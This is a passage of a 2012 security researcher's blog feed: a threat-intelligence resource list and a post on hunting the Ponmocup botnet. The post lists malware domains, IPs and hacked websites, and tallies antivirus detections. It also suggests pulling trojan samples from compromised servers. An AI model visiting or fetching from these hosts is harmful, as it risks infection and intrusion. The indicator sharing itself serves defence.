I'd be curious to know what percentage (or ppm) of any list of domains would be infected. Anyone wants to take a guess?<br />
<br />
<br />TomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.com0tag:blogger.com,1999:blog-4767199732858434539.post-43671792100067374062012-05-14T13:23:00.001-07:002012-05-31T15:01:43.785-07:00Threat Intelligence and APT ResourcesThis post is to share some of the resources I found interesting and useful recently. In addition I would like to thank my friends who interacted with me in the past and also work hard to fight cybercrime and Internet threats in general.<br />
<br />
<i>(in random order)</i><br />
<br />
Thanks to Mila from <a href="http://contagiodump.blogspot.com/" target="_blank">contagio dump blog</a> for linking to my blog from <a href="http://contagiodump.blogspot.com/2010/07/advanced-persistent-threat-targeted.html" target="_blank">your APT page</a>, which I also recommend reading. Also very useful is the <a href="http://contagiodump.blogspot.com/2010/06/overview-of-exploit-packs-update.html" target="_blank">list of browser exploit packs</a> and all the great analysis of targeted attacks.<br />
<br />
Thanks Keith for mentioning my tweets on your blog (<a href="http://www.digital4rensics.com/blog/2012/02/thanks-for-sharing/" target="_blank">Thanks for Sharing</a> and <a href="http://www.digital4rensics.com/blog/2012/02/thanks-for-sharing-indicators/" target="_blank">Indicators</a>) and for the great work in posting <a href="http://ioc.forensicartifacts.com/" target="_blank">IOCs</a>.<br />
<br />
Thanks Kyle for mentions on your blog post <a href="http://threatthoughts.com/2012/05/07/introduction-to-the-collective-intelligence-framework/" target="_blank">Introduction to the Collective Intelligence Framework</a>. I definitely recommend checking out <a href="http://code.google.com/p/collective-intelligence-framework/" target="_blank">CIF</a>.<br />
<br />
Thanks <a href="http://www.mandiant.com/" target="_blank">Mandiant</a> for all your <a href="http://www.mandiant.com/resources/downloads" target="_blank">free tools</a> (<a href="http://www.mandiant.com/resources/download/redline/" target="_blank">Redline</a>, <a href="http://www.mandiant.com/resources/download/ioc-finder" target="_blank">IOC-Finder</a> etc.), great resources (<a href="https://blog.mandiant.com/" target="_blank">M-unition blog</a>, <a href="http://www.mandiant.com/events/webinars/" target="_blank">webinars</a>) and interesting <a href="http://www.mandiant.com/resources/m-trends/" target="_blank">M-Trends reports</a>.<br />
<br />
Thanks <a href="https://securosis.com/" target="_blank">Securosis</a> for all the great free <a href="https://securosis.com/blog/" target="_blank">resources</a> (<a href="https://securosis.com/projectquant/malware-analysis-quant-index-of-posts" target="_blank">Malware Analysis Quant</a> etc.) and <a href="https://securosis.com/research" target="_blank">research</a> <a href="https://securosis.com/research/research-reports" target="_blank">papers</a> published.<br />
<br />
Thanks Command-Five for great <a href="http://www.commandfive.com/research.html" target="_blank">research papers</a> and <a href="http://www.commandfive.com/downloads/c5sigma.html" target="_blank">C5 SIGMA</a> free network analysis tool.<br />
<a href="http://www.commandfive.com/papers/C5_APT_C2InTheFifthDomain.pdf" target="_blank"><span class="inline-title"><i>Command and Control in the Fifth Domain</i></span></a><br />
<div class="float-left">
<a href="http://www.commandfive.com/papers/C5_APT_ADecadeInReview.pdf" target="_blank"><span class="inline-title"><i>Advanced Persistent Threats: A Decade in Review</i></span></a></div>
<br />
Here are some blog posts about APT that I can recommend reading:<br />
<br />
<div class="post-title entry-title" style="font-family: inherit;">
Eric Huber's blog post <span style="font-size: small;"><a href="http://www.ericjhuber.com/2012/05/to-apt-or-not-to-apt.html">To APT or Not To APT?</a></span></div>
<div class="post-title entry-title" style="font-family: inherit;">
<br /></div>
<div class="post-title entry-title" style="font-family: inherit;">
</div>
<div class="post-title entry-title" style="font-family: inherit;">
Mike Cloppert's blog series on SANS computer forensics<br />
<a href="http://blogs.sans.org/computer-forensics/2009/07/22/security-intelligence-introduction-pt-1/">Security Intelligence: Introduction (pt 1)</a><br />
<a href="http://blogs.sans.org/computer-forensics/2009/07/23/security-intelligence-introduction-pt-2/">Security Intelligence: Introduction (pt 2) </a><br />
<a href="https://blogs.sans.org/computer-forensics/2009/10/14/security-intelligence-attacking-the-kill-chain/">Security Intelligence: Attacking the Kill Chain</a><br />
<a href="http://blogs.sans.org/computer-forensics/2010/06/21/security-intelligence-knowing-enemy/">Security Intelligence: Defining APT Campaigns</a></div>
<div class="post-title entry-title" style="font-family: inherit;">
<br />
<i>Update 2012-05-25: </i>here are some more interesting papers that I enjoyed.<br />
<br />
<a href="http://papers.rohanamin.com/?p=15" target="_blank">Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains</a> [<a href="http://papers.rohanamin.com/wp-content/uploads/papers.rohanamin.com/2011/08/iciw2011.pdf" target="_blank">PDF</a>]<br />
<br />
<a href="http://papers.rohanamin.com/wp-content/uploads/papers.rohanamin.com/2011/08/amin_dissertation_final.pdf" target="_blank">Detecting Targeted Malicious Email through Supervised Classification of Persistent Threat and Recipient Oriented Features</a> <i>(Dissertation by Rohan Mahesh Amin, 2011)</i><br />
<br />
<a href="http://www.contextis.com/news/articles/" target="_blank">Crouching Tiger, Hidden Dragon, Stolen Data</a> [<a href="http://www.contextis.com/news/articles/targetedattacks/Targeted_Attacks_Whitepaper.pdf" target="_blank">PDF</a>]<br />
<br />
<a href="http://www.uscc.gov/RFP/2012/USCC%20Report_Chinese_CapabilitiesforComputer_NetworkOperationsandCyberEspionage.pdf" target="_blank">Occupying the Information High Ground: Chinese Capabilities for Computer Network Operations and Cyber Espionage</a> [<a href="http://www.uscc.gov/pressreleases/2012/12_3_8.pdf" target="_blank">PR</a>]<br />
<br />
<a href="http://project2049.net/documents/pla_third_department_sigint_cyber_stokes_lin_hsiao.pdf" target="_blank">The Chinese People's Liberation Army Signals Intelligence and Cyber Reconnaissance Infrastructure</a><br />
<br />
<br /></div>
<div class="post-title entry-title" style="font-family: inherit;">
So how do you <a href="http://threatthoughts.com/2011/11/13/threat-intel-sharing-with-openioc/" target="_blank">share your threat intelligence</a> with others and how / where do you find it online?</div>
<div class="post-title entry-title" style="font-family: inherit;">
<br /></div>
<div class="post-title entry-title" style="font-family: inherit;">
I've been <a href="https://twitter.com/c_APT_ure" target="_blank">tweeting</a> some indicators in the past and collected some of these tweets on storify "<a href="http://storify.com/c_APT_ure/malware-intelligence" target="_blank">malware intelligence</a>". I've also created IOCs for <a href="https://forums.mandiant.com/topic/ioc-request-for-ponmocup-malware-botnet" target="_blank">Ponmocup</a> and other malware (<a href="http://ioc.forensicartifacts.com/2012/05/pws-zbot-gen-xj/" target="_blank">Zeus</a>, <a href="http://ioc.forensicartifacts.com/2012/05/debugger-persistence-mechanism/" target="_blank">debugger persistence</a> and <a href="https://forums.mandiant.com/topic/sysadmin-tools-and-security-features-disabled-by-malware-ioc" target="_blank">more</a>) and posted them on <a href="https://forums.mandiant.com/" target="_blank">Mandiant's forums</a> and <a href="http://ioc.forensicartifacts.com/">ioc.forensicartifacts.com</a>.</div>
<div class="post-title entry-title" style="font-family: inherit;">
<br /></div>
<div class="post-title entry-title" style="font-family: inherit;">
I will update this post eventually with new, more recent resources and infos available.</div>
<div class="post-title entry-title" style="font-family: inherit;">
<br /></div>
<div class="post-title entry-title" style="font-family: inherit;">
If you find this blog useful consider linking to it from your blog (what, you don't have one!? Why not?) or tweet about it.</div>
<div class="post-title entry-title" style="font-family: inherit;">
<br /></div>
<div class="post-title entry-title" style="font-family: inherit;">
If you know other useful blogs or resources not mentioned here (or on my recommended blogs list) please let me know. </div>
<div class="post-title entry-title" style="font-family: inherit;">
<br /></div>
<div class="post-title entry-title" style="font-family: inherit;">
Thanks for reading all the way to the end ;-)</div>
<div class="post-title entry-title" style="font-family: inherit;">
<br /></div>TomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.com0tag:blogger.com,1999:blog-4767199732858434539.post-33715173472882336452012-04-27T15:07:00.011-07:002012-05-31T14:36:43.550-07:00Hunting Ponmocup Botnet<span style="color: red; font-style: italic; font-weight: bold;">Updated 2012-05-31: </span><span style="color: red; font-style: italic;">find new malware domains and IPs at the end of this post</span><span style="font-style: italic; font-weight: bold;"><br /></span><br />
<br />
<br />
Welcome to my third post about the <a href="http://c-apt-ure.blogspot.com/search/label/ponmocup">ponmocup</a> malware / botnet.<br />
<br />
I have some more malware intel to share and also some request to other researchers as well.<br />
Following is a <a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/2012-04-27/ponmocup-urls-2012_a.txt">list of Ponmocup redirection domains</a> along with the domain of the hacked/infected website and date when it was discovered.<br />
<br />
<span style="font-family: courier new; font-size: 85%;">#--------------------------------------------------------------------------<br /># malware-domain malware-ip infected-website [date] (/cgi-bin/r.cgi)<br />#--------------------------------------------------------------------------<br />apartliberal.com - www.canadawideflowers.ca [22/Mar/2012]<br />apartliberal.com - www.despec.com [23/Jan/2012]<br />argumenthistorical.org - www.steingym.schulnetz.hamm.de [08/Feb/2012]<br />argumenthistorical.org - www.steingym.schulnetz.hamm.de [18/Apr/2012]<br />argumenthistorical.org - www.stv-neuenhof.ch [17/Jan/2012]<br />besidesdream.com - flowerbouquetsforweddings.com [27/Feb/2012]<br />besidesdream.com - www.armsnetafrica.org [25/Jan/2012]<br />besidesdream.com - www.flowerbouquetsforweddings.com [27/Feb/2012]<br />besidesdream.com - www.hillsidebeachclub.com [29/Mar/2012]<br />capitalinformer.com - www.hotelanderoper.com [31/Jan/2012]<br />capitalinformer.com 82.98.86.165 bgs-architekten.com [17/Apr/2012]<br />checkforsec.com 8.5.1.45 www.artistas-americanos.com [12/Apr/2012]<br />costslaid.com - halongtours.com [25/Jan/2012]<br />costslaid.com - halongtours.com [26/Jan/2012]<br />costslaid.com - www.dynam-med.info [05/Jan/2012]<br />costslaid.com - www.jenniferhejna.com [09/Feb/2012]<br />costslaid.com - www.krcgent.be [27/Mar/2012]<br />dutytraditional.net - riccardoscamarcio.org [07/Feb/2012]<br />dutytraditional.net - vivadasrestaurant.ch [11/Jan/2012]<br />dutytraditional.net - www.moebel-direkt.net [16/Jan/2012]<br />dutytraditional.net - www.moebel-direkt.net [17/Feb/2012]<br />dutytraditional.net - www.pr-klartext.de [27/Feb/2012]<br />dutytraditional.net - www.redtoo.com [20/Jan/2012]<br />dutytraditional.net - www.swisshelp.info [27/Mar/2012]<br />dutytraditional.net - www.vivadasrestaurant.com [02/Jan/2012]<br />dutytraditional.net - www.vivadasrestaurant.com [03/Jan/2012]<br />dutytraditional.net - www.vivadasrestaurant.com [09/Jan/2012]<br />dutytraditional.net - www.vivadasrestaurant.com [11/Jan/2012]<br />earlyanswered.com - www.vdomil.com [30/Jan/2012]<br />everybodynames.org 94.63.149.247 www.kreutz-solutions.ch [16/Jan/2012]<br />formedtouch.com - www.voegelitherapie.com [12/Mar/2012]<br />gamecomes.org 94.63.149.247 www.ryandarts.de [08/Mar/2012]<br />handsexual.com 94.63.149.247 www.perfler.ch [10/Feb/2012]<br />handsexual.com 94.63.149.247 www.theleesonhotel.com [16/Jan/2012]<br />herocopter.com - www.aylar.no [09/Jan/2012]<br />herocopter.com - www.titan.vc [12/Jan/2012]<br />herocopter.com 199.59.241.228 www.stublla.net [23/Apr/2012]<br />herocopter.com 199.59.241.232 www.guatemala-tourisme.info [27/Mar/2012]<br />iamprotectedfrom.net - www.newtonvineyard.com [20/Apr/2012]<br />indanetwall.net - schoenstefaschingskostueme.com [27/Feb/2012]<br />indanetwall.net 199.59.241.228 www.forexonlinegeheimnisse.com [24/Apr/2012]<br />indanetwall.net 199.59.241.228 www.hexenkostueme.com [18/Apr/2012]<br />indanetwall.net 94.63.149.246 www.hexenkostueme.com [12/Jan/2012]<br />infernomag.com - cryptonaux.co.uk [06/Jan/2012]<br />infernomag.com - www.samariter-zuerich-uu.ch [24/Jan/2012]<br />interestingchapter.net - www.hypequest.com [16/Jan/2012]<br />interestingchapter.net - www.hypequest.com [17/Jan/2012]<br />interestingchapter.net - www.hypequest.com [21/Mar/2012]<br />interestingchapter.net - www.hypequest.com [30/Jan/2012]<br />jesusonlynet.org 94.63.149.246 www.babfinance.net [13/Mar/2012]<br />jesusonlynet.org 94.63.149.246 www.babfinance.net [23/Apr/2012]<br />jesusonlynet.org 94.63.149.246 www.babfinance.net [29/Mar/2012]<br />lewisentitled.com 62.212.74.224 www.extremebusa.com [20/Feb/2012]<br />lewisentitled.com 62.212.74.224 www.feliceapicella.it [16/Jan/2012]<br />lewisentitled.com 62.212.74.224 www.lotex24.net [02/Apr/2012]<br />lewisentitled.com 62.212.74.224 www.lotex24.net [03/Apr/2012]<br />lewisentitled.com 62.212.74.224 www.ps3-fifaliga.de [13/Jan/2012]<br />lewisentitled.com 62.212.74.224 www.radiofreecuba.com [22/Mar/2012]<br />lewisentitled.com 62.212.74.224 www.thehighheelstore.com [21/Jan/2012]<br />metromanias.com - sixstringtheory.com [27/Jan/2012]<br />metromanias.com - www.boiron.ch [03/Jan/2012]<br />metromanias.com - www.boiron.ch [14/Jan/2012]<br />metromanias.com - www.midagiochi.com [26/Jan/2012]<br />metromanias.com - www.whuckaba.com [25/Jan/2012]<br />philosophymercer.com 62.212.74.228 aviationhumor.net [20/Apr/2012]<br />philosophymercer.com 62.212.74.228 dallasbbq.com [03/Jan/2012]<br />philosophymercer.com 62.212.74.228 www.football-session.com [07/Feb/2012]<br />philosophymercer.com 62.212.74.228 www.greenzer.fr [12/Jan/2012]<br />philosophymercer.com 62.212.74.228 www.greenzer.fr [19/Apr/2012]<br />philosophymercer.com 62.212.74.228 www.greenzer.fr [29/Feb/2012]<br />philosophymercer.com 62.212.74.228 www.greenzer.fr [29/Mar/2012]<br />philosophymercer.com 62.212.74.228 www.greenzer.fr [31/Mar/2012]<br />reportedtechniques.org 94.63.149.246 mjmbooks.com [23/Feb/2012]<br />reportedtechniques.org 94.63.149.246 online-aste.com [13/Mar/2012]<br />reportedtechniques.org 94.63.149.246 online-aste.com [23/Mar/2012]<br />reportedtechniques.org 94.63.149.246 www.chinchillazucht.eu [02/Mar/2012]<br />reportedtechniques.org 94.63.149.246 www.kurtlarvadisi.com [09/Jan/2012]<br />reportedtechniques.org 94.63.149.246 www.kurtlarvadisi.com [25/Jan/2012]<br />reportedtechniques.org 94.63.149.246 www.mhw-bike-house.de [27/Mar/2012]<br />reportedtechniques.org 94.63.149.246 www.panafilmforum.com [01/Feb/2012]<br />reportedtechniques.org 94.63.149.246 www.schlosstaetscher.ch [06/Jan/2012]<br />reportedtechniques.org 94.63.149.246 www.schlosstaetscher.ch [24/Jan/2012]<br />reportedtechniques.org 94.63.149.246 www.w-en-ve.nl [19/Mar/2012]<br />severalcamp.com 94.63.149.246 www.stadtbredimus.lu [07/Feb/2012]<br />sslabssys.com 208.91.197.101 www.bestofpinball.de [17/Jan/2012]<br />teethalong.org 94.63.149.246 gyro-bau.ch [12/Mar/2012]<br />teethalong.org 94.63.149.246 gyro-bau.ch [23/Mar/2012]<br />teethalong.org 94.63.149.246 www.brautwelt.com [15/Mar/2012]<br />teethalong.org 94.63.149.246 www.brautwelt.com [24/Apr/2012]<br />teethalong.org 94.63.149.246 www.brautwelt.com [25/Apr/2012]<br />teethalong.org 94.63.149.246 www.demton.hu [08/Feb/2012]<br />teethalong.org 94.63.149.246 www.lotusnaturalspa.ch [04/Jan/2012]<br />thousandmilitary.com - lemobilierdesign.com [01/Feb/2012]<br />thousandmilitary.com - lemobilierdesign.com [08/Feb/2012]<br />thousandmilitary.com - lemobilierdesign.com [09/Feb/2012]<br />thousandmilitary.com - lemobilierdesign.com [09/Mar/2012]<br />thousandmilitary.com - pippatoledoshop.com [18/Feb/2012]<br />thousandmilitary.com - www.lemobilierdesign.com [12/Mar/2012]<br />thousandmilitary.com - www.lemobilierdesign.com [20/Apr/2012]<br />trackallnet.com - awmusic.ca [03/Mar/2012]<br />trackallnet.com - kueppersbusch.getware.de [07/Mar/2012]<br />trackallnet.com 94.63.149.246 kueppersbusch.getware.de [13/Jan/2012]<br />trialworld.net 69.43.161.177 www.smelugano2.ch [27/Mar/2012]<br />twiceseparate.com - insurancepersonalpropertyassessments.com [18/Jan/2012]<br />underbuild.net 94.63.149.246 rabita-ms.ch [09/Feb/2012]<br />underbuild.net 94.63.149.246 www.sudani.co.za [23/Apr/2012]<br />underbuild.net 94.63.149.246 www.unterwasserkamera.at [09/Mar/2012]<br />underbuild.net 94.63.149.246 www.unterwasserkamera.at [26/Jan/2012]<br />underbuild.net 94.63.149.246 www.unterwasserkamera.at [28/Feb/2012]<br />virtualmapping.org - www.globusgateway.ch [16/Jan/2012]<br />watchingsquare.com - www.comboxansagen.com [26/Mar/2012]<br /><br />#--------------------------------------------------------------------------<br /># malware-domain malware-ip infected-website [date] (/url)<br />#--------------------------------------------------------------------------<br />52586.pballgames.com 77.79.11.96 www.apollonreisen.com [24/Apr/2012]<br />53771.peachtreepropainters.biz 77.79.11.96 www.flyksa.com [16/Apr/2012]<br />57298.learn2drive4free.com 178.211.33.203 www.autocamp-nordsee.com [19/Apr/2012]<br />59368.3d-tablet.cc 77.79.11.96 www.europschool.net [12/Apr/2012]<br />61503.3d-tablet.cc 77.79.11.96 europschool.net [26/Apr/2012]<br />62342.thepetserver.com 77.79.11.96 www.oceanview-house.com [24/Apr/2012]<br />ceprez.recycling-computers-portland.com 176.53.112.108 hellokittyfighters.de [19/Apr/2012]<br />fckery.getbetweenthecovers.com 178.211.33.203 www.ferienwohnung-hotels-kroatien.de [12/Apr/2012]</span><br />
<br />
Of the 88 domains above, 60 servers still appear to be infected at this time.<br />
<ul>
<li><a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/2012-04-27/ponmocup-urls-2012_domains.txt">list of 88 domains</a></li>
<li><a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/2012-04-27/ponmocup-urls-2012_domains-infected.txt">list of 60 infected servers</a></li>
<li><a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/2012-04-27/ponmocup-urls-2012_wget-log.txt">log of wget 1</a> & <a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/2012-04-27/ponmocup-urls-2012_wget-log_a.txt">2</a></li>
</ul>
Now part of me says "why haven't you already informed all website owners or hosters about the hacked servers?". But the other part thinks, why not use the hacked servers to get some more current trojan-downloader samples and infect some (VM) clients to study the C&C traffic and create new network indicators (since the "old" ET Snort rules seem ineffective now).<br />
<br />
Well, and that's the <span style="font-weight: bold;">challenge or request to other malware researchers</span>, since I haven't been able to successfully download any samples recently.<br />
<br />
I've shown in the wget logs how you can (try to) download an infector sample. Try it from a "home IP" and/or a "corporate IP-range" (should be safe with wget), you might get different results.<br />
<br />
Actually, after taking a closer look at the files downloaded by wget, it looks like the malware download would only work with a browser. Take a look at the scripts at the end of <a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/2012-04-27/wget_bgs-architekten_com.txt">one file</a>.<br />
<br />
So you probably won't get the malware using wget anymore.<br />
<br />
When infecting a client, try using a corporate IP-, DNS-, Domain-config, since I believe "ipconfig" is called by the trojan-downloader and the further behaviour could depend on the ipconfig output.<br />
<br />
If you're interested in researching this malware / botnet and are able to do any of the above mentioned I'd be very interested to hear from you.<br />
<br />
Thanks for any help or feedback!<br />
<br />
@c_APT_ure<br />
<br />
<span style="font-style: italic; font-weight: bold;">Updated 2012-04-30:</span><br />
<br />
I've collected some of my tweets about the Ponmocup malware here on Storify:<br />
<a href="http://storify.com/c_APT_ure/a-v-failed-for-ponmocup-malware">http://storify.com/c_APT_ure/a-v-failed-for-ponmocup-malware</a><br />
<br />
So I found a new source of malware today, <a href="http://virusshare.com/">virusshare.com</a>, thanks to Ken!<br />
Searching for "ponmocup" I got 160 results, but I could <a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/VirusShare/VirusShare_search-ponmocup.htm">download only 20</a>.<br />
<br />
<div style="color: blue;">
<span style="font-style: italic; font-weight: bold;">Updated 2012-05-13:</span></div>
<i style="color: blue;">I received the results for all 160 Ponmocup samples. See additional stats at the end.</i><br />
<br />
Here is an analysis of the A/V detections of these 20 samples:<br />
<br />
<span style="font-size: 85%;"><span style="font-family: courier new;"> 20 Panda</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 20 NOD32</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 20 Ikarus</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 20 GData</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 20 F-Secure</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 20 Emsisoft</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 20 DrWeb</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 20 BitDefender</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 20 Avast</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 19 Norman</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 19 Kaspersky</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 19 Fortinet</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 19 Comodo</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 19 AntiVir</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 19 AhnLab-V3</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 19 AVG</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 18 TrendMicro-HouseCall</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 18 TrendMicro</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 18 Microsoft</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 18 K7AntiVirus</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 17 nProtect</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 17 VIPRE</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 17 McAfee-GW-Edition</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 17 McAfee</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 17 Jiangmin</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 15 VirusBuster</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 15 Symantec</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 15 Sophos</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 14 VBA32</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 14 TheHacker</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 14 PCTools</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 11 F-Prot</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 11 Commtouch</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 10 SUPERAntiSpyware</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 9 Rising</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 9 ClamAV</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 9 Antiy-AVL</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 eTrust-Vet</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 ViRobot</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 6 ByteHero</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 5 eSafe</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 3 CAT-QuickHeal</span></span><br />
<br />
And the detections are:<br />
<br />
<span style="font-size: 85%;"><span style="font-family: courier new;"> 1 AVG = Downloader.Generic10.BMDC</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AVG = Downloader.Generic10.BOLE</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AVG = Downloader.Small.62.D</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AVG = Dropper.Generic4.BXSO</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 AVG = Dropper.VB.CMD</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AVG = Generic22.JDH</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AVG = Generic25.AFPK</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AVG = Generic25.AIJK</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AVG = Generic25.BRLU</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AVG = Generic25.BTFX</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AVG = Generic25.BTHJ</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AVG = Suspicion: unknown virus</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AhnLab-V3 = Trojan/Win32.HDC</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 2 AhnLab-V3 = Trojan/Win32.Jorik</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AhnLab-V3 = Trojan/Win32.Monder</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 5 AhnLab-V3 = Trojan/Win32.Pirminay</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 AhnLab-V3 = Trojan/Win32.Swisyn</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AhnLab-V3 = Win-Trojan/Pirminay.313344.M</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AhnLab-V3 = Win-Trojan/Pirminay.438601</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AntiVir = TR/Crypt.XPACK.Gen</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AntiVir = TR/Dldr.Ponmocup.A.393</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AntiVir = TR/Downloader.Gen</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AntiVir = TR/Graftor.1139.2</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AntiVir = TR/Graftor.3421.1</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AntiVir = TR/Graftor.3421.2</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AntiVir = TR/Monder.mzyl</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AntiVir = TR/Pirminay.bg.2</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AntiVir = TR/Pirminay.bhf</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AntiVir = TR/Pirminay.bhy</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AntiVir = TR/Spy.438876.1</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 AntiVir = TR/VB.Downloader.Gen</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 2 Antiy-AVL = Trojan/Win32.Jorik</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Antiy-AVL = Trojan/Win32.Jorik.gen</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Antiy-AVL = Trojan/Win32.Monder</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Antiy-AVL = Trojan/Win32.Pirminay</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 3 Antiy-AVL = Trojan/Win32.Pirminay.gen</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Antiy-AVL = Trojan/win32.agent</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 Avast = Win32:Hosts-J [Trj]</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Avast = Win32:Kryptik-WL [Trj]</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Avast = Win32:MalOb-EI [Cryp]</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 7 Avast = Win32:Malware-gen</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Avast = Win32:Pirminay-DW [Trj]</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Avast = Win32:Spyware-gen [Spy]</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 Avast = Win32:Trojan-gen</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 BitDefender = Backdoor.Generic.542938</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 BitDefender = Gen:Variant.Graftor.1139</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 BitDefender = Gen:Variant.Graftor.3421</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 BitDefender = Gen:Variant.Vundo.11</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 BitDefender = Trojan.Generic.5274711</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 BitDefender = Trojan.Generic.6148391</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 2 BitDefender = Trojan.Generic.6270838</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 BitDefender = Trojan.Generic.6764589</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 BitDefender = Trojan.Generic.6871065</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 BitDefender = Trojan.Generic.6892427</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 BitDefender = Trojan.Generic.KD.393940</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 BitDefender = Trojan.QHosts.AVD</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 5 ByteHero = Trojan.Win32.Heur.Gen</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 ByteHero = Virus.Win32.Heur.p</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 CAT-QuickHeal = Trojan.Jorik.Pirminay.aoq</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 CAT-QuickHeal = Trojan.Monder.mzyl</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 CAT-QuickHeal = TrojanDownloader.Ponmocup.a</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 ClamAV = Trojan.Agent-183385</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 ClamAV = Trojan.VB-43290</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 2 Commtouch = 